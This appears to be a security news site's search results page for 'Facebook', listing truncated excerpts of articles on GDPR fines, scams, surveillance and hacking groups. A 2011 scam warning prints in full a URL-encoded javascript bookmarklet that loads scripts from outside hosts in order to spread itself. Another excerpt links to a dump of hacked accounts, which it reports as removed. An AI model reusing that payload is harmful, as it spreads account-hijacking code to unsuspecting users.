#1 Trusted Cybersecurity News Platform Followed by 4.50+ million
The Hacker News Logo
Get the Free Newsletter
SaaS Security

Search results for Facebook | Breaking Cybersecurity News | The Hacker News

Irish Regulators Fine Facebook $414 Million for Forcing Users to Accept Targeted Ads

Irish Regulators Fine Facebook $414 Million for Forcing Users to Accept Targeted Ads

Jan 05, 2023 Privacy / Data Protection
The Irish Data Protection Commission (DPC) has  fined  Meta Platforms €390 million (roughly $414 million) over its handling of user data for serving personalized ads in what could be a major blow to its ad-fueled business model. To that end, the privacy regulator has ordered Meta Ireland to pay two fines – a €210 million ($222.5 million) fine over violations of the E.U. General Data Protection Regulation ( GDPR ) related to Facebook, and a €180 million ($191 million) for similar violations in Instagram. The latest enforcement comes in the wake of concerns that the social media company used its Terms of Service to gain users' forced consent to allow targeted advertising based on their online activity. The complaints were filed on May 25, 2018, the date when GDPR came into effect in the region. It also arrives a month after the European Data Protection Board (EDPB), an independent body that oversees the consistent application of GDPR in the E.U.,  announced  that it had reached 
New Facebook Scam : WTF I can’t believe you’re in this video !

New Facebook Scam : WTF I can't believe you're in this video !

May 16, 2011
New Facebook Scam : WTF I can't believe you're in this video ! If you happen to get a new wall post from your friend saying " WTF I can't believe you're in this vid " or " ROFL i cant believe youre tagged in this video " Its a new scam spreading on Facebook. Don't open or click on this link else it will be posted to all your friends wall, esp. copy any URL [java-script code] and paste in your browser navigation/location bar to help spread the message to all your friends. javascript:(function()%7Bfunction%20s(src)%7Bvar%20script%20%3D%20document.createElement(%22script%22)%3Bscript.src%20%3D%20src%3Bdocument.body.appendChild(script)%3B%7Dvar%20rand%20%3D%20Math.floor(Math.random()*(100))%3Bs(%22http%3A%2F%2Fvideosurge.info%2Fverify.js%22)%3B%20if(rand%20%3C%3D%2025)%20s(%22http%3A%2F%2Fvideosurge.info%2Fconfig.js%22)%3Belse%20s(%22http%3A%2F%2Fbanfish.info%2Fconfig.js%22)%3B%7D)()%3B Most importantly for the user who fall into such scams by clicking the links in impulse. Re
Making Sense of Operational Technology Attacks: The Past, Present, and Future

Making Sense of Operational Technology Attacks: The Past, Present, and Future

Mar 21, 2024Operational Technology / SCADA Security
When you read reports about cyber-attacks affecting operational technology (OT), it's easy to get caught up in the hype and assume every single one is sophisticated. But are OT environments all over the world really besieged by a constant barrage of complex cyber-attacks? Answering that would require breaking down the different types of OT cyber-attacks and then looking back on all the historical attacks to see how those types compare.  The Types of OT Cyber-Attacks Over the past few decades, there has been a growing awareness of the need for improved cybersecurity practices in IT's lesser-known counterpart, OT. In fact, the lines of what constitutes a cyber-attack on OT have never been well defined, and if anything, they have further blurred over time. Therefore, we'd like to begin this post with a discussion around the ways in which cyber-attacks can either target or just simply impact OT, and why it might be important for us to make the distinction going forward. Figure 1 The Pu
Google, Paypal, Facebook Internal IP disclosure vulnerability

Google, Paypal, Facebook Internal IP disclosure vulnerability

Dec 31, 2013
Do you have any idea about an Internal IP Address or a Private IP Address that too assigned for Multinational Companies? Yeah, today we are gonna discuss about Internal IP or Private IP address Disclosure. Disclosure of an Internal IP like 192.168.*.* or 172.16.*.* , can really Impact ? Most security researchers call it as "bull shit" vulnerability. But when it comes to impact calculation even if the server is behind a firewall or NAT, an attacker can see internal IP of the remote host and this may be used to further attacks. Internet Giants like Facebook, Google, PayPal and Serious National Security organizations like FBI, Pentagon and NASA are taking initiatives for their Security Issues. At same, we at ' The Hacker News ' stand together for organizations that talk about national security in a serious way. I guess,its the time to understand about the flaws and its impacts where I would like to share my findings about our Internet Giants and Organiza
cyber security

Automated remediation solutions are crucial for security

websiteWing SecurityShadow IT / SaaS Security
Especially when it comes to securing employees' SaaS usage, don't settle for a longer to-do list. Auto-remediation is key to achieving SaaS security.
What is Certificate Transparency? How It helps Detect Fake SSL Certificates

What is Certificate Transparency? How It helps Detect Fake SSL Certificates

Apr 11, 2016
Do you know there is a huge encryption backdoor still exists on the Internet that most people don't know about? I am talking about the traditional Digital Certificate Management System … the weakest link, which is completely based on trust, and it has already been broken several times. To ensure the confidentiality and integrity of their personal data, billions of Internet users blindly rely on hundreds of Certificate Authorities (CA) around the globe. In this article I am going to explain: The structural flaw in current Digital Certificate Management system. Why Certificate Authorities (CA) have lost the Trust. How Certificate Transparency (CT) fixes issues in the SSL certificate system. How to early detect every SSL Certificates issued for your Domain, legitimate or rogue? First, you need to know Certificate Authority and its role: Certificate Authority and its Role A Certificate Authority (CA) is a third-party organization that acts as a centr
Apple to Scan Every Device for Child Abuse Content — But Experts Fear for Privacy

Apple to Scan Every Device for Child Abuse Content — But Experts Fear for Privacy

Aug 06, 2021
Apple on Thursday said it's introducing new child safety features in iOS, iPadOS, watchOS, and macOS as part of its efforts to limit the spread of Child Sexual Abuse Material (CSAM) in the U.S. To that effect, the iPhone maker said it intends to begin client-side scanning of images shared via every Apple device for known child abuse content as they are being uploaded into iCloud Photos, in addition to leveraging on-device machine learning to vet all iMessage images sent or received by minor accounts (aged under 13) to warn parents of sexually explicit photos shared over the messaging platform. Furthermore, Apple also plans to update Siri and Search to stage an intervention when users try to perform searches for CSAM-related topics, alerting that the "interest in this topic is harmful and problematic." "Messages uses on-device machine learning to analyze image attachments and determine if a photo is sexually explicit," Apple  noted . "The feature is desi
Lulzsec Exposed, Long Live Anonymous !

Lulzsec Exposed, Long Live Anonymous !

Jun 26, 2011
Lulzsec Exposed, Long Live Anonymous ! Lulz war ! Today Hacking group "Lulzsec" completed their 50th day and also announce the retirement of Lulz boat . What are the Reasons behind this ? Lulz Security's rise to prominence has been extraordinarily fast.The hacking group first emerged in May and in the past few weeks has attacked the websites of some of the world's leading corporations and governments. The group specialises in locating websites with poor security and then stealing information from them and posting it online via Twitter account, well They have 278,429 Followers]in 50days. To understand who/what lulzsec is, you need to understand where they came from. Everything originates from the chan (4chan/711chan/etc.) culture. It's a culture built around the anonymity of the internet. If your anonymous no one can find you. No one can hurt you, so your invincable. According to Anonymous " The problem with Lulzsec is that they lack the skills to kee
Windows 10 Wi-Fi Sense Explained: Actual Security Threat You Need to Know

Windows 10 Wi-Fi Sense Explained: Actual Security Threat You Need to Know

Jul 31, 2015
Just one day after Microsoft released its new operating system, over 14 Million Windows users  upgraded their PCs to Windows 10 . Of course, if you are one of the Millions, you should aware of Windows 10's Wi-Fi Sense feature that lets your friends automatically connects to your wireless network without providing the Wi-Fi password. Smells like a horrible Security Risk! It even triggered a firestorm among some security experts, who warned that Wi-Fi Sense is a terrible and dangerous feature and that you should disable it right away. Even some researchers advised Windows 10 users to rename their Wi-Fi access points. Before discussing the risks of Wi-Fi Sense, let's first know how it works. Also Read:  How to Fix 35+ Windows 10 Privacy Issues With Just One Click . How Windows 10 Wi-Fi Sense works? Windows 10 Wi-Fi Sense feature allows you to share your Wi-Fi password with your friends or contacts, as well as lets you automatically connect to networ
Facebook releases 'Conceal' API for Android developers to Encrypt data on Disk

Facebook releases 'Conceal' API for Android developers to Encrypt data on Disk

Feb 07, 2014
Many Smartphone applications support, installation or app data storage to an external SD Card, that can be helpful in saving space on the internal memory, but also vulnerable to hackers. Typically, an app that has permission to read and write data from an SD card has the permission to read all data on that card, including information written by other apps. This means that if you install a malicious application by mistake, it can easily steal any sensitive data from your Phone's SD Card. To prevent the data from being misused by any other app, the best implementation is to encrypt the data, but that will drop the performance of the device. On its 10th birthday, as a treat for mobile developers, Facebook has unveiled the source code of its Android security tool called ' Conceal ' cryptographic API Java library, that will allow app developers to encrypt data on disk in the most resource efficient way, with an easy-to-use programming interface. Smaller th
More than 10,000 Facebook account hacked by TeamSwaSTika

More than 10,000 Facebook account hacked by TeamSwaSTika

Oct 17, 2011
More than 10,000 Facebook account hacked by TeamSwaSTika Another group of Hackers, self titled Team Swastika, have caused panic amongst Facebook users after releasing the details of 10,000 accounts onto popular text sharing site, Pastebin. Pastebin, usually used to share source code, has frequently been host to a number of text files that contain the details of specific hacks by hackitivists and hacker groups. Team Swastika is just one of these hackitivist groups but claims to be the most powerful hacking team in Nepal. They also said that next target will be Nepal Government website. Facebook hacked account dump: https://pastebin.com/KYsd0j5B (part1) - Removed by Pastebin https://pastebin.com/nN5uDrQS (part2) - Removed by Pastebin
Facebook Shuts Down Covert Political 'Influence Operations' from Russia and China

Facebook Shuts Down Covert Political 'Influence Operations' from Russia and China

Sep 28, 2022
Meta Platforms on Tuesday disclosed it took steps to dismantle two covert influence operations originating from China and Russia for engaging in coordinated inauthentic behavior (CIB) so as to manipulate public debate. While the Chinese operation sets its sights on the U.S. and the Czech Republic, the Russian network primarily targeted Germany, France, Italy, Ukraine and the U.K. with themes surrounding the ongoing war in Ukraine. "The largest and most complex Russian operation we've disrupted since the war in Ukraine began, it ran a sprawling network of over 60 websites impersonating news organizations, as well as accounts on Facebook, Instagram, YouTube, Telegram, Twitter, Change.org and Avaaz, and even LiveJournal," the social media behemoth  said . The sophisticated Russian activity, which commenced in May 2022, impersonated mainstream European news outlets like Der Spiegel, The Guardian, and Bild, not to mention build credibility by creating fake accounts across
Hamas-linked Hackers Targeting High-Ranking Israelis Using 'Catfish' Lures

Hamas-linked Hackers Targeting High-Ranking Israelis Using 'Catfish' Lures

Apr 07, 2022
A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations. "The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason  said  in a Wednesday report. "The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes." The monthslong intrusions, codenamed " Operation Bearded Barbie ," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon. Most recently, the threat actor was  held responsible  for attacks aimed at Palestinian activists
WhatsApp, Viber and Skype Internet Calls may No Longer be FREE in India

WhatsApp, Viber and Skype Internet Calls may No Longer be FREE in India

Jul 18, 2015
We all are aware of Net Neutrality and the recent controversies over it in India. Net Neutrality is simply the Internet Freedom — Free, Fast and Open Internet for all.  India has been battling for Net Neutrality since zero-rating services such as Facebook's Internet.org and Airtel Zero were announced. The Department of Telecommunications (DoT) has now released a much-awaited report [ PDF ] on the Net Neutrality issue, recommending the Telecom Regulatory Authority of India (TRAI) to regulate the voice calls conducted by the Internet users of over-the-top (OTT) services. Over 100 pages-long report details the DoT's understanding of Net Neutrality Principles, which has been criticized by consumer groups because it could End Free domestic voice calls offered by apps like WhatsApp and Skype. The Report says, "the core principles of net neutrality must be adhered to," and user rights on the Internet need to be protected, so that the Telecom Service Provid
NSA’s #XKeyscore program could read Facebook Chats And Private Messages

NSA's #XKeyscore program could read Facebook Chats And Private Messages

Jul 31, 2013
According to a new report revealed by NSA leaker Edward Snowden , The National Security Agency has a secret program that allows it to see just about everything a person does on the Internet.  An NSA tool called DNI Presenter, used to read the content of stored emails, also enables an analyst using XKeyscore to read the content of Facebook chats or private messages.  An analyst can monitor such Facebook chats by entering the Facebook user name and a date range into a simple search screen. XKeyscore provides the technological capability, if not the legal authority, to target even US persons for extensive electronic surveillance without a warrant provided that some identifying information, such as their email or IP address, is known to the analyst. The Guardian has published several NSA training slides from the program: The NSA documents show that as of 2008, the X-Keyscore platform was used to nab 300 alleged terrorists around the world. Another
Cybersecurity Resources